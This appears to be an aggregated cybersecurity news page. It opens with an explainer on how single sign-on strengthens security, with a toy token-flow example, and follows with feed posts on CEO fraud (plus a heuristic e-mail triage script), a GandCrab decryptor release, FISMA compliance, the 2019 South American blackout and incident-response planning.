SSO: How It Improves Cybersecurity and User Experience

A single sign-on (SSO) project in an organization is usually triggered by user dissatisfaction with the current IT systems and with the need to remember several user IDs and passwords to reach everyday applications.

Without a system that stores credentials and presents them to applications on the user's behalf, many users simply ignore security policy: they choose weak passwords (short, simple, predictable) or share them with trusted colleagues, even outside the office.

A good SSO serves both sides: users get simple, fast authentication to every application they are authorized for, and the organization can enforce one comprehensive security policy across all IT systems. SSO strengthens authentication and gives a central record of access to every controlled application. In addition, CFOs will see a significant reduction in the cost of managing and resetting user passwords.

How single sign-on (SSO) increases IT security

SSO is becoming a best practice in IT security. It reduces the cognitive burden on IT administrators, lets them concentrate on IT management, and improves operational workflows. As part of a cybersecurity strategy, SSO is a strategic investment in an organization's IT security, for the following reasons:

SSO increases security by replacing conventional passwords

Passwords are involved in a large share of security breaches because they can be lost, shared, stolen, or forgotten. When a user's password leaks, the perimeter of the entire company can be thrown open. With SSO, companies can effectively close that human perimeter and retire most of the individual credentials their employees hold. By replacing passwords with safer, faster, and stronger authentication methods, such as badge tap-in, SSO eliminates many of the weaknesses of legacy passwords and significantly improves corporate cybersecurity. Note that SSO also concentrates risk: the one credential that now opens every application lives at the central identity provider, so that credential must be protected with strong multi-factor authentication and the provider itself must be monitored closely.

SSO improves security by reducing cognitive load

Passwords force users to keep splitting their attention between their computer systems and their actual work. By making users type long alphanumeric strings into dialog boxes over and over, passwords add to employees' cognitive load. That strain pushes professionals to improvise insecure workarounds to reduce their frustration: writing passwords on paper, using shared generic credentials, or sharing accounts. Such workarounds are convenient for users, but they are a nightmare for IT security. By removing that cognitive load, single sign-on lets users open their sessions quickly and easily without typing long, complicated passwords many times a day.

SSO increases security by reducing exposure to phishing

No matter how careful a user is, they can be manipulated into revealing their password through clever social-engineering tactics. Phishing techniques are sophisticated enough that even experienced users fall for them. Users who are tired of changing, recovering, and repeatedly typing complex passwords become desensitized to password prompts. If an attacker presents a fake login dialog or a fake password-reset email, at least one user will fall into the trap. By replacing manually typed passwords with a secure, centralized single sign-on system, users are protected from most password-harvesting attempts, simply because there is no per-application password left to type into a fake prompt. The one credential that remains, the login to the identity provider itself, should be backed by phishing-resistant multi-factor authentication.

SSO improves security by freeing IT resources

An SSO solution is far easier to manage than a password-heavy IT estate. Without a sprawl of user passwords that are frequently changed, lost, or forgotten, IT departments are no longer bogged down with mundane password-reset calls and related maintenance requests. With SSO, IT can refocus its time and energy on more strategic security initiatives while the SSO solution centralizes password resets and provides the necessary reporting and auditing.

An effective SSO solution improves an organization's security by eliminating its biggest security problem: the password. By replacing passwords, SSO reduces the burden on users, improves workflows, protects the organization from breaches, and frees IT resources for more strategic security projects. For each of these reasons, implementing an SSO solution is a sound cybersecurity decision for businesses.
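To make "centralized authentication" concrete, here is a toy single sign-on flow written for this page as an added example; it is not code from the article or from any vendor product. The identity provider (IdP) checks the user's password exactly once, then mints short-lived, audience-bound assertions that each application verifies without ever seeing the password; revocation and the audit trail live in one place. The HMAC key shared between the IdP and each app is an assumption standing in for the public-key signatures real SAML/OIDC deployments use, and the user, app names and lifetimes are made up.

```python
"""Toy single sign-on: one identity provider (IdP), many relying parties.
Added example for this page, not code from the article or any product.
Assumption: an HMAC-SHA256 key shared between the IdP and each app stands
in for the public-key signatures real SAML/OIDC deployments use."""
import base64
import hashlib
import hmac
import json
import os
import secrets
import time

ROUNDS = 100_000  # assumed PBKDF2 cost for the IdP's own password store


class IdentityProvider:
    def __init__(self):
        self._users = {}       # username -> (salt, pbkdf2 digest)
        self._app_keys = {}    # app name -> key shared with that app
        self._sessions = {}    # session id -> username
        self._revoked = set()  # session ids killed centrally
        self.audit_log = []    # one central record of every logon and assertion

    def register_user(self, username, password):
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
        self._users[username] = (salt, digest)

    def register_app(self, app):
        key = secrets.token_bytes(32)
        self._app_keys[app] = key
        return key             # delivered to the app out of band

    def login(self, username, password):
        """The only place a password is ever checked. Returns a session id or None."""
        rec = self._users.get(username)
        if rec is None:
            self.audit_log.append(("login_failed", username))
            return None
        salt, digest = rec
        cand = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
        if not hmac.compare_digest(cand, digest):
            self.audit_log.append(("login_failed", username))
            return None
        sid = secrets.token_hex(16)
        self._sessions[sid] = username
        self.audit_log.append(("login_ok", username, sid))
        return sid

    def issue_assertion(self, sid, app, ttl=300, now=None):
        """Mint an assertion for one app from an existing session; no password involved."""
        now = int(time.time() if now is None else now)
        user = self._sessions.get(sid)
        if user is None or sid in self._revoked or app not in self._app_keys:
            self.audit_log.append(("assertion_denied", sid, app))
            return None
        claims = {"sub": user, "aud": app, "sid": sid, "iat": now,
                  "exp": now + ttl, "jti": secrets.token_hex(8)}
        body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
        sig = hmac.new(self._app_keys[app], body.encode(), hashlib.sha256).hexdigest()
        self.audit_log.append(("assertion_issued", user, app, claims["jti"]))
        return body + "." + sig

    def revoke(self, sid):       # one switch cuts the user off from every application
        self._revoked.add(sid)

    def is_revoked(self, sid):
        return sid in self._revoked


class RelyingParty:
    def __init__(self, name, key, idp):
        self.name, self._key, self._idp = name, key, idp

    def verify(self, token, now=None):
        """Return (username, 'ok') or (None, reason); checks run in a fixed order."""
        now = time.time() if now is None else now
        body, _, sig = token.partition(".")
        expected = hmac.new(self._key, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, sig):
            return None, "bad signature"
        claims = json.loads(base64.urlsafe_b64decode(body))
        if claims["aud"] != self.name:  # matters when every app shares one verification key
            return None, "wrong audience"
        if now >= claims["exp"]:
            return None, "expired"
        if self._idp.is_revoked(claims["sid"]):
            return None, "session revoked"
        return claims["sub"], "ok"


def demo(now=1_700_000_000):
    """Happy path plus the four ways an assertion must be rejected."""
    idp = IdentityProvider()
    idp.register_user("alice", "correct horse battery staple")   # constructed user
    mail = RelyingParty("mail", idp.register_app("mail"), idp)
    hr = RelyingParty("hr", idp.register_app("hr"), idp)
    sid = idp.login("alice", "correct horse battery staple")
    tok = idp.issue_assertion(sid, "mail", now=now)
    flipped = tok[:-1] + ("0" if tok[-1] != "0" else "1")       # tamper with the signature
    results = {
        "mail": mail.verify(tok, now=now),
        "replayed_at_hr": hr.verify(tok, now=now),   # hr's key differs: signature fails first
        "expired": mail.verify(tok, now=now + 600),
        "tampered": mail.verify(flipped, now=now),
    }
    idp.revoke(sid)
    results["after_revocation"] = mail.verify(tok, now=now)
    return results
```

Running `demo()` shows the property the article is after: the mail and HR applications never handle a password, a token minted for one application is useless at another, it dies on its own after five minutes, and a single `revoke()` at the IdP locks the user out of everything at once while `audit_log` holds the whole story in one place.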



Why phishing education has never been more critical to your business

Our cyber defenses are becoming stronger every year. Even the smallest companies can now deploy advanced anti-malware and intrusion detection tools that were, until recently, only within the reach of larger enterprises. Today, sandboxed behavior detection and machine-learning/artificial-intelligence powered security services make it easy for organizations of any size to crack down on even the most sophisticated malware. Users are still the weakest link. But as our network perimeter and endpoint security … More

The post Why phishing education has never been more critical to your business appeared first on Help Net Security.

One year of GDPR application: Europeans well aware of their digital rights

Europeans are relatively well aware of the new data protection rules, their rights and the existence of national data protection authorities, to whom they can turn for help when their rights are violated, according to the European Commission. “European citizens have become more aware of their digital rights and this is encouraging news. However, only three in ten Europeans have heard of all their new data rights. For companies, their customers’ trust is hard currency … More

The post One year of GDPR application: Europeans well aware of their digital rights appeared first on Help Net Security.

Researchers develop app to detect Twitter bots in any language

Thanks to fruitful collaboration between language scholars and machine learning specialists, a new application that can detect Twitter bots independent of the language used was developed by researchers at the University of Eastern Finland and Linnaeus University in Sweden. In recent years, big data from various social media applications have turned the web into a user-generated repository of information in an ever-increasing number of areas. Because of the relatively easy access to tweets and their metadata, … More

The post Researchers develop app to detect Twitter bots in any language appeared first on Help Net Security.

CEO Fraud

CEO Fraud / BEC (business email compromise) is a type of targeted attack. It commonly involves a cybercriminal pretending to be your boss and tricking you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any email demanding immediate action and/or asking you to bypass a security procedure.
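The two warning signs in the tip above, urgency and a request to bypass procedure, combine with a third one a mail gateway can check by itself: does the display name belong to an executive while the address does not? The following triage heuristic is an added example written for this page, not part of the original tip or of any product. The executive roster, the organization's domain and the three sample messages are constructed; the thresholds (a 0.8 string-similarity ratio for lookalike domains, quarantine only when an identity anomaly coincides with a money or bypass ask) are assumptions to tune against real mail.

```python
"""Heuristic CEO-fraud / BEC triage over e-mail headers and body text.
Added example; roster, domain, thresholds and sample messages are constructed."""
import re
from difflib import SequenceMatcher
from email.utils import parseaddr

ORG_DOMAIN = "example.com"                       # constructed
EXECUTIVES = {                                   # constructed roster: display name -> real address
    "jane doe": "jane.doe@example.com",
    "raj patel": "raj.patel@example.com",
}
URGENCY = re.compile(r"\b(?:urgent(?:ly)?|immediately|asap|right away)\b", re.I)
BYPASS = re.compile(
    r"\b(?:skip|bypass|no need for|don'?t (?:go through|bother with))\s+"
    r"(?:the\s+)?(?:(?:usual|normal|standard)\s+)?"
    r"(?:approval|process|procedure|controls?|verification)s?\b", re.I)
MONEY = re.compile(r"\b(?:wire|transfer|gift cards?|invoice|payment|payroll|w-?2s?)\b", re.I)
IDENTITY_TAGS = {"impersonation", "lookalike", "reply-to"}


def _domain(addr):
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def is_lookalike(domain, target):
    """Cheap typo-squat check: near-identical to, but not equal to, our own domain."""
    return domain != target and SequenceMatcher(None, domain, target).ratio() >= 0.8


def assess(msg):
    """Return a list of (tag, detail) findings for one message dict (From, Reply-To, Subject, Body)."""
    findings = []
    name, addr = parseaddr(msg.get("From", ""))
    real = EXECUTIVES.get(name.strip().lower())
    if real and addr.lower() != real:
        findings.append(("impersonation", f"'{name}' is an executive but the sender is {addr}"))
    dom = _domain(addr)
    if dom and is_lookalike(dom, ORG_DOMAIN):
        findings.append(("lookalike", f"sender domain {dom} resembles {ORG_DOMAIN}"))
    _, reply = parseaddr(msg.get("Reply-To", ""))
    if reply and _domain(reply) != dom:
        findings.append(("reply-to", f"replies go to {reply}, not to the sender"))
    text = msg.get("Subject", "") + "\n" + msg.get("Body", "")
    if URGENCY.search(text):
        findings.append(("urgency", "pressure to act immediately"))
    if BYPASS.search(text):
        findings.append(("bypass", "asks to skip a control"))
    if MONEY.search(text):
        findings.append(("money", "requests funds or financial data"))
    return findings


def verdict(msg):
    """quarantine: identity anomaly AND a money/bypass ask; warn: any single signal; else deliver."""
    tags = {tag for tag, _ in assess(msg)}
    if tags & IDENTITY_TAGS and tags & {"money", "bypass"}:
        return "quarantine"
    return "warn" if tags else "deliver"


SAMPLES = [  # constructed messages: lookalike domain, genuine exec, free-mail impersonation
    {"From": "Jane Doe <jane.doe@example-mail.com>", "Subject": "Urgent wire",
     "Body": "I need you to wire $48,000 to the vendor below immediately. "
             "Skip the usual approval, I will sign off when I am back."},
    {"From": "Jane Doe <jane.doe@example.com>", "Subject": "Q3 numbers",
     "Body": "Can you send me the Q3 numbers when you have a moment?"},
    {"From": "Raj Patel <raj.patel.ceo@gmail.com>", "Reply-To": "raj.patel.ceo@gmail.com",
     "Subject": "Quick favour", "Body": "Are you at your desk? I need gift cards for a client, urgent."},
]

if __name__ == "__main__":
    for m in SAMPLES:
        print(verdict(m), assess(m))
```

The content signals alone only earn a warning banner, because executives do send urgent mail; it is the combination with a sender that is not who the display name claims that turns a message into a quarantine candidate. Anything this misses still comes down to the human rule in the tip: verify out of band before moving money or data.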

How employees and their organizations are prioritizing data privacy

Employees in the UK expressed greater understanding of privacy laws, and better training opportunities, than those in the U.S., the ObserveIT survey reveals. The survey polled 1,000 full-time employees in the United States and United Kingdom to determine their understanding of their organizations’ current privacy regulations. New policies and regulations dictating organizations’ handling of sensitive consumer information – such as the GDPR, the CCPA and Vermont’s data privacy law – have brought to light the … More

The post How employees and their organizations are prioritizing data privacy appeared first on Help Net Security.

Economic cycles and disruption are where top CFOs set their firms apart from the competition

Conflicting signals on the economy and related uncertainty should be looked upon by CFOs as an opportunity to accelerate growth and innovation strategies, according to Gartner. Gartner experts highlighted the key differences between firms that use uncertainty to accelerate business performance and those that stall, and the specific behaviors of CFOs that allow their firms to accelerate during times of economic and industry uncertainty. “Far from being something to dread, changing economic cycles and disruption … More

The post Economic cycles and disruption are where top CFOs set their firms apart from the competition appeared first on Help Net Security.

To Air-Gap or Not Air-Gap Industrial Control Networks

What is air-gapping, and why do we air-gap networks? Which camp are you in: the one that believes in air-gaps, or the one that says they truly do not exist? Air-gapped networks are networks that are physically and logically isolated from other networks, where communication between these networks is not physically or logically … Read More

The post To Air-Gap or Not Air-Gap Industrial Control Networks appeared first on The State of Security.

Arctic Wolf Managed Risk solution provides proactive vulnerability management services

Arctic Wolf Networks, a leading security operations center (SOC)-as-a-service company, announced the Arctic Wolf Managed Risk solution to provide proactive identification, analysis, and prevention of vulnerabilities. “Companies know that they need to reduce their attack surface, but they often don’t know where to begin. Arctic Wolf Managed Risk service helps companies make sense of their cyber risk profile, by continuously scanning internal/external networks and endpoints, and quantifying cyber risk-based vulnerabilities,” said Brian NeSmith, CEO and … More

The post Arctic Wolf Managed Risk solution provides proactive vulnerability management services appeared first on Help Net Security.

Keyfactor and Thales launch Keyfactor Code Assure, providing secure code signing

Keyfactor, a leading provider of secure digital identity management solutions, announced a new integration with Thales that combines Keyfactor’s code signing platform with the high-assurance key protection of Thales’ SafeNet Cloud HSM On-Demand. The result of this partnership, Keyfactor Code Assure, delivers secure code signing to software vendors, mobile app developers, enterprise IT organizations, and manufacturers of IoT devices. “We’re seeing a rise in threats against code signing operations, like the recent ASUS hack where … More

The post Keyfactor and Thales launch Keyfactor Code Assure, providing secure code signing appeared first on Help Net Security.

CipherCloud adds new email security capabilities in its CipherCloud Zero Trust CASB+ platform

CipherCloud, a leader in cloud security, announced new email security capabilities in its CipherCloud Zero Trust CASB+ platform, combining zero trust threat prevention with industry leading data protection technologies. In addition to the new email security, the CipherCloud platform provides innovative adaptive control enforcing zero trust cloud security with continuous risk assessment; zero-day threat protection and real-time blocking; and machine learning that detects compromised credentials and anomalous behaviors across cloud applications. The platform seamlessly extends … More

The post CipherCloud adds new email security capabilities in its CipherCloud Zero Trust CASB+ platform appeared first on Help Net Security.

WekaIO updates its software platform security for mixed enterprise workloads

WekaIO, the leader in high-performance, scalable file storage for data intensive applications, announced updates to its software platform with advanced security functionality for multi-use enterprise high performance computing (HPC). WekaIO has built the industry’s first flash-native parallel file system that delivers unmatched performance to the most demanding applications, scaling to exabytes of data in a single namespace. Multitenancy allows enterprises to drive business profits by leveraging data across many different applications and groups and accelerating … More

The post WekaIO updates its software platform security for mixed enterprise workloads appeared first on Help Net Security.

CrowdStrike and Inflow Technologies to distribute CrowdStrike Falcon platform to APJ region

CrowdStrike, a leader in cloud-delivered endpoint protection, announced Inflow Technologies as a distributor in India and the South Asian portions of Asia-Pacific and Japan (APJ). Through this partnership, Inflow Technologies will deliver the CrowdStrike Falcon platform to regional customers looking for comprehensive endpoint protection. The CrowdStrike Falcon platform, powered by AI, continues to set the standard in endpoint protection by unifying next-generation antivirus (NGAV), IT hygiene, endpoint detection and response (EDR), cyber threat intelligence, and … More

The post CrowdStrike and Inflow Technologies to distribute CrowdStrike Falcon platform to APJ region appeared first on Help Net Security.

Deepfake LinkedIn Profile Shows Espionage Threat

A deepfake account with possible connections to foreign espionage activity has been identified on LinkedIn.

“Katie Jones” purported to be a senior researcher for the Center for Strategic and International Studies (CSIS). Her well-connected profile on the professional social media site seemed legitimate, with connections that included a deputy assistant secretary of state and economist Paul Winfree, currently being considered for a seat on the Federal Reserve.

An investigation conducted by the Associated Press found that Jones doesn’t exist, and that her profile photo–depicting an attractive woman in her 30s–was a deepfake created using generative adversarial networks, or GANs, AI-driven software that can produce believable images of fictitious people.

“For a while now people have been worrying about the threat of ‘deepfakes’, AI-generated personas that are indistinguishable, or almost indistinguishable, from real live humans,” tweeted AP reporter Raphael Satter, who first reported on the story.

“I conducted about 40 interviews, speaking to all but a dozen of Katie’s connections. Overwhelmingly, her connections told me they accepted whoever asked to their network,” Satter wrote in another tweet.

LinkedIn has been called a “spy’s playground” in reference to the site’s functionality, which makes accepting connections from strangers routine by suggesting that doing so might benefit their own careers. The German domestic intelligence agency, the Bundesamt für Verfassungsschutz (BfV), warned of the potential danger of the platform and how “[i]nformation about habits, hobbies and even political interests can be generated with only a few clicks.”

“Instead of dispatching spies to some parking garage in the U.S to recruit a target, it’s more efficient to sit behind a computer in Shanghai and send out friend requests to 30,000 targets,” said William Evanina, director of the U.S. National Counterintelligence and Security Center.

Digital imaging experts warn LinkedIn users to look for telltale signs of GAN-generated profiles, such as those in the below photo. Several more examples can be found on the website, which randomly generates GAN photos.

AP Deepfake photo
Source: AP Photo

Read the original AP report here.

The post Deepfake LinkedIn Profile Shows Espionage Threat appeared first on Adam Levin.

Trend Micro partners with VIVOTEK to enhance IP cameras security

Trend Micro, a global leader in cybersecurity solutions, announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, a global leading IP security solution provider, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection. By analyzing data from 7,000 anonymously aggregated IP cameras, Trend Micro found that the IP-based surveillance industry is fighting massive cyberattacks, but few … More

The post Trend Micro partners with VIVOTEK to enhance IP cameras security appeared first on Help Net Security.

Cyber Attack Not Ruled-out For 5-Nation Power Outage

Paraguay, Chile, Brazil, Uruguay, and Argentina have been experiencing large-scale power outages since June 16, 2019, 7:07 am Argentina time. Argentinian authorities described it as a cascading failure of the power grid, with one section tripping after another until five countries were affected. Argentinian President Mauricio Macri took to Twitter to state that the cause is still unknown. “This morning, a fault in the coastal transmission system caused a power outage in the entire country, whose cause we cannot yet determine precisely. This is an unprecedented case that will be thoroughly investigated,” explained Macri.

His energy secretary, Gustavo Lopetegui, made a short but curious comment regarding the incident. “This is an extraordinary event that should never have happened. It’s very serious. We can’t leave the country without power from one moment to another. At this moment we do not rule out any possibilities but … a cyberattack is not within the preliminary alternatives being considered,” said Lopetegui. As of this writing, Edenor and Edesur, the two largest electricity providers in Argentina, are hard at work to fully restore power to the whole country. A substantial share of Argentina's power comes from the Yacyretá Dam on the border with Paraguay.

“A massive failure in the electrical interconnection system left all of Argentina and Uruguay without power. This is the first time something like this has happened across the entire country,” emphasized Alejandra Martinez, Edesur’s spokeswoman.

University of Buenos Aires Professor, Raul Bertero claimed that the power grid has design and systemic operation errors, which made the power outage more severe than expected. “A localized failure like the one that occurred should be isolated by the same system. The problem is known and there is technology and studies that [work to] avoid it,” said Bertero.

“It is important to clarify that this total disconnection happens automatically. It’s the computers that run the system that does it when they detect imbalances that could cause major harm, and in milliseconds the system disconnects in order to protect itself. There was no alert here. There was no possibility for an alert here because it’s something that a human can’t detect. There is no human intervention,” added Lopetegui.

Argentina’s power grid is linked with those of Uruguay, Paraguay, Chile and part of Brazil, all of which experienced outages at the same time. Edesur denied that Paraguay and Uruguay suffered country-wide outages, saying that only a small percentage of their population was without electricity. The areas of Argentina hit hardest were Mendoza, Córdoba, La Rioja, Chubut, San Luis, Formosa and Santa Fe. Paraguay reported that parts of Villalbín, Ayolas, Misiones, Ñeembucú and Pilar had experienced the outage as well.

“Everything came to a halt. Elevators, water pumps, everything. We were left adrift. There are some elderly people on the eighth floor but nothing happened, because the power cut was short. If it had gone on for longer it would have been a whole different story,” said Juan Borges, a resident of Buenos Aires.


A free Decryptor tool for GandCrab Ransomware released

Good news for the victims of the latest variants of the GandCrab ransomware: the No More Ransom project has released a free decryption tool.

Victims of the latest variants of the GandCrab ransomware can now decrypt their files for free using a decryptor tool released on the No More Ransom website. The tool works with versions 5 to 5.2 of the ransomware, as well as versions 1 and 4.

“On 17 June, a new decryption tool for the latest version of the most prolific ransomware family GandCrab has been released free of charge on” reads the press release published by Europol. “This tool allows victims of ransomware to regain access to their information encrypted by hackers, without having to pay demanded ransoms.”

The GandCrab decryptor tool is the result of a partnership between law enforcement agencies from Austria (Bundeskriminalamt – BMI), Belgium (Federal Computer Crime Unit), Bulgaria (General Directorate Combating Organized Crime – Cybercrime Department), France (Police Judiciaire de Paris – Befti), Germany (LKA Baden-Württemberg), the Netherlands (High Tech Crime Unit), Romania (DIICOT), the United Kingdom (NCA and Metropolitan Police), the United States (FBI) and Europol and its Joint Cybercrime Action Taskforce (J-CAT), together with the private partner Bitdefender.

The ransomware appeared in the threat landscape in early 2018, when experts at the cybersecurity firm LMNTRIX discovered a new ransomware-as-a-service dubbed GandCrab. The RaaS was advertised in the Russian-speaking hacking community on the dark web, and researchers noticed that its authors leveraged the RIG and GrandSoft exploit kits to distribute the malware.

In a little over a year its operators released several versions with numerous enhancements, but in June they announced they were shutting down the operation, and affiliates were told to stop distributing the ransomware.

GandCrab ransomware V4

In October 2018, experts at the Cybaze Z-Lab analyzed one of the latest iterations of the infamous GandCrab ransomware, version 5.0.

The operators claimed to have generated more than $2 billion in ransom payments, earning on average $2.5 million per week, and to have netted $150 million that they have now invested in legal businesses.

Experts at Bitdefender pointed out that not all victims are treated equally:

“GandCrab prioritizes ransomed information and sets individual pricing by type of victim,” reads a blog post published by Bitdefender. “An average computer costs from $600 to $2,000 to decrypt, and a server decryption costs $10,000 and more. While helping victims with decryption, we’ve seen ransom notes asking for as much as $700,000, which is quite a price for one wrong click.”

According to Europol, previously released tools for the GandCrab ransomware have helped more than 30,000 victims recover their data for free and save roughly $50 million in unpaid ransoms.

The joint efforts have also weakened the operators’ position on the cybercrime market and contributed to the demise and shutdown of the operation. Bitdefender and McAfee experts provided a significant contribution to the fight against this threat.

You can download the GandCrab decryption tool for free at the following address:

Pierluigi Paganini

(SecurityAffairs – ransomware, decryptor tools)

The post A free Decryptor tool for GandCrab Ransomware released appeared first on Security Affairs.

What Is FISMA Compliance?

In today’s digital world, information is the most important asset of many organizations. It drives many of their business decisions and their ability to earn money. That is also why attackers target corporate data. FISMA was created to counter this threat for federal information.

What is FISMA compliance?

FISMA is an abbreviation of the Federal Information Security Management Act. It is a United States federal law from 2002 that requires federal agencies to develop and implement an information security program. FISMA is actually Title III of a larger act, the E-Government Act of 2002, which seeks to improve electronic government services and processes overall.

All in all, FISMA is among the most important regulations when it comes to federal data security standards. It was established to reduce threats against federal data and information while managing the spending on federal information security. To attain its goals and purpose, FISMA created a set of guidelines that government agencies must adhere to. This scope was later increased to include state agencies that administer federal programs such as Medicare. FISMA compliance is also applicable to any private business that has a contractual relationship with the government.

The Office of Management and Budget, or OMB, released a new set of guidelines in April 2010 that now requires federal agencies to provide real-time data to FISMA auditors for continuous monitoring of FISMA information systems.

What Are FISMA Compliance Requirements?

In January 2003, the FISMA Implementation project was launched, and the National Institute of Standards and Technology, or NIST, played a huge role in this. They created the basic concept and standards required by FISMA. This has included several publications, including FIPS 199, FIPS 200, and NIST 800 series.

The top FISMA compliance requirements are:

  • Information System Inventory

Every federal agency and contractor that works with the government is required to keep an inventory of all systems and assets used within the organization. They should also identify integrations of these systems, as well as any others that might be in their network.

  • Security Controls

NIST SP 800-53 provides an extensive catalog of security controls for FISMA compliance. Agencies and contractors do not need to implement every control; they are required to implement those that are relevant to their organization and network, and to document the selection in their system security plan.

  • System Security Plan

FISMA requires agencies to create a system security plan and to maintain and update it regularly. It should cover the security controls in place, the security policies that apply, and a timetable for rolling out further controls.

  • Risk Assessments

A key part of FISMA compliance is assessing the risks of an agency’s information security. They can refer to NIST SP 800-30 for guidance on how to properly conduct risk assessment. It should be three-tiered in order to identify security risks from an organizational level to a business process level and finally, to an information system level.

  • Certifications and Accreditation

For FISMA compliance, agency heads and program officials need to conduct annual security reviews so they are able to minimize security threats. FISMA Certification and Accreditation can be achieved by agencies through a four-phased process: planning, certification, accreditation, and monitoring.

FISMA Compliance Benefits

The implementation of FISMA has increased the overall security for federal information. With continuous monitoring, agencies could maintain a high level of security and minimize, if not outright eliminate, vulnerabilities in an efficient manner.

Companies that operate in the private sector, especially those that deal with federal agencies, can greatly benefit from FISMA compliance, as it gives them an edge in acquiring new business from other federal agencies.

What Are the Penalties for Non-compliance with FISMA Requirements?

There is a range of potential penalties for both federal agencies and private companies that do not adhere to FISMA requirements, which include reduction of federal funding, censure by Congress, and of course, damage to their reputation.

Best Practices for FISMA Compliance

Obtaining FISMA compliance should not be difficult. Here are best practices to help an organization meet the requirements set forth by FISMA. It may not be exhaustive, but it will help in attaining the goal of compliance.

  • Automatically encrypt all sensitive data: It is ideal to have this as a norm and even supply your team with a tool to encrypt data based on classification level or when it is put at risk.
  • Classify information: When creating data, they should be classified based on sensitivity immediately. This helps in prioritizing when to implement security controls.
  • Document written evidence of FISMA Compliance: As updates occur, make sure to document all changes done, in order to adhere to FISMA regulations.


Upcoming Webinar: GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant!

TrustArc is proud to present the next Privacy Insight Series webinar “GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant!” with TrustArc General Counsel & Chief Data Governance Officer Hilary Wandall and Centre for Information Policy Leadership at Hunton & Williams LLP President Bojana Bellamy. This webinar will take place on Wednesday, June 19th at 9am PT / 12pm ET / 5pm GMT. Don’t miss this opportunity to learn more about GDPR compliance – register today! Many companies have invested significant time and resources trying to design and implement GDPR compliance programs. Internally, they may have generated hundreds … More

The post Upcoming Webinar: GDPR Compliance: Convince Customers, Partners, and The Board You Are Compliant! appeared first on TrustArc Blog.

How to recover from a security breach

Experts estimate that ransomware attacks are up over 600 percent. For most companies, the issue isn’t if a cyberattack is going to happen, but when. Some security experts advise that the best way to recover from a security breach is to plan for it before it happens.

Today we take you through:

  • Strategies for building a plan for a cybersecurity attack.
  • Four tips for sharing information with your customers.
  • How to mitigate or prevent cyber incidents.

Strategies for building a plan for a cybersecurity attack

It’s natural to focus on technology and systems during a cyberattack, but it’s just as important to understand how your business is going to respond to the event—internally, to your customers, and to the general public. How do you escalate information and to whom? You often need to integrate input from communications, operations, IT, finance, and other departments. That’s why creating a plan is so important. You want to make sure you can respond quickly and have the right outcomes for your business priorities.

You also need to identify the impact on your systems. Understanding the technology impact during a breach usually means defining an internal security operations center (SOC) process flow, decision trees, and a communications escalation process that specifies when information arrives, who is told about it, when they are told, and what they need to do about it. Sorting incident information into categories ahead of time gives the business the chance to think things through and build the plan before there is an actual incident.
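One way to write that decision tree and escalation process down so it can be exercised before an incident, as an added example for this page rather than Microsoft's own process: classify the incident from what was touched, whether it left, and whom it hurts; derive who must be told by when; and report which notifications are overdue. The severity thresholds, the roster of roles and hours, and the 30-day containment target are constructed assumptions to be replaced with the organization's own.

```python
"""Incident classification and communications-escalation plan as code.
Added example; severity rules, roster, and the containment target are assumptions."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Incident:
    detected_at: datetime
    data_classes: set           # e.g. {"pii", "credentials"}
    exfil_confirmed: bool
    systems_affected: int
    customer_facing: bool
    notified: set = field(default_factory=set)   # roles already told (recorded by the SOC)


SENSITIVE = {"pii", "credentials", "payment"}
ROSTER = {   # severity -> [(role, hours after detection by which the role must be told)]
    "SEV1": [("SOC lead", 0), ("CISO", 1), ("Legal", 4), ("Comms", 4), ("CEO", 8)],
    "SEV2": [("SOC lead", 0), ("CISO", 4), ("Legal", 24)],
    "SEV3": [("SOC lead", 8)],
}
CONTAINMENT_TARGET = timedelta(days=30)   # assumed; the post cites 30 days as the cost cliff


def classify(inc):
    """Decision tree: what was touched, did it leave, who does it hurt."""
    sensitive = bool(inc.data_classes & SENSITIVE)
    if inc.exfil_confirmed and (sensitive or inc.customer_facing):
        return "SEV1"
    if sensitive or inc.customer_facing or inc.systems_affected >= 10:
        return "SEV2"
    return "SEV3"


def escalation_plan(inc):
    """Who must know, by when, plus the containment deadline the response is measured against."""
    sev = classify(inc)
    deadlines = [(role, inc.detected_at + timedelta(hours=h)) for role, h in ROSTER[sev]]
    return sev, deadlines, inc.detected_at + CONTAINMENT_TARGET


def overdue_notifications(inc, now):
    """Roles whose deadline has passed without a notification being recorded."""
    _, deadlines, _ = escalation_plan(inc)
    return [role for role, due in deadlines if now > due and role not in inc.notified]


if __name__ == "__main__":
    t0 = datetime(2019, 6, 17, 9, 0)                    # constructed detection time
    inc = Incident(t0, {"pii"}, True, 3, True)
    print(escalation_plan(inc))
    print(overdue_notifications(inc, t0 + timedelta(hours=5)))
```

Tabletop exercises can drive `overdue_notifications()` with a fake clock to check that the roster and thresholds produce the calls the business actually wants, before a real incident tests them.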

Four tips for sharing information with your customers

Companies that contain a security breach in less than 30 days can save millions of dollars. That’s an incentive. But the impact of a breach is more than just financial—it impacts your reputation.

Here are four tips for responding to customers in an efficient, thoughtful way that can mitigate the damage of the attack:

  1. Deliver the right message to your customers after a breach—quickly. Companies used to have the luxury to wait and let the investigation play out before updating the public. Now there is the expectation that if a company has information, it’s doing a disservice to its customers by withholding it.
  2. Be simple and clear. This is where working with your communications team is essential. Practice your communications and response plan before it happens to learn how to improve.
  3. Be cautious. Being transparent and clear doesn’t mean that you have to say absolutely everything about the investigation. In technology, investigations can lead to additional discoveries. Make it clear that the investigation is ongoing and provide updates as the story unfolds. Don’t say anything that you wouldn’t stake your job on, because you might have to.
  4. Divulge any information that could benefit customers who have been affected by the breach, and think beyond your business. In 2018, Under Armour reported that its fitness and nutrition app, MyFitnessPal, had been hacked. Email addresses and hashed passwords were stolen, affecting 150 million users. Under Armour advised customers to change the password for the app and anywhere else it was used. That action demonstrated to customers that the company had thought about the impact of the breach beyond its own product.

Increasingly companies are expected to think about their customers beyond their specific relationship and consider how a data compromise impacts a customer’s relationship with other companies and accounts.

How to mitigate or prevent cyber incidents

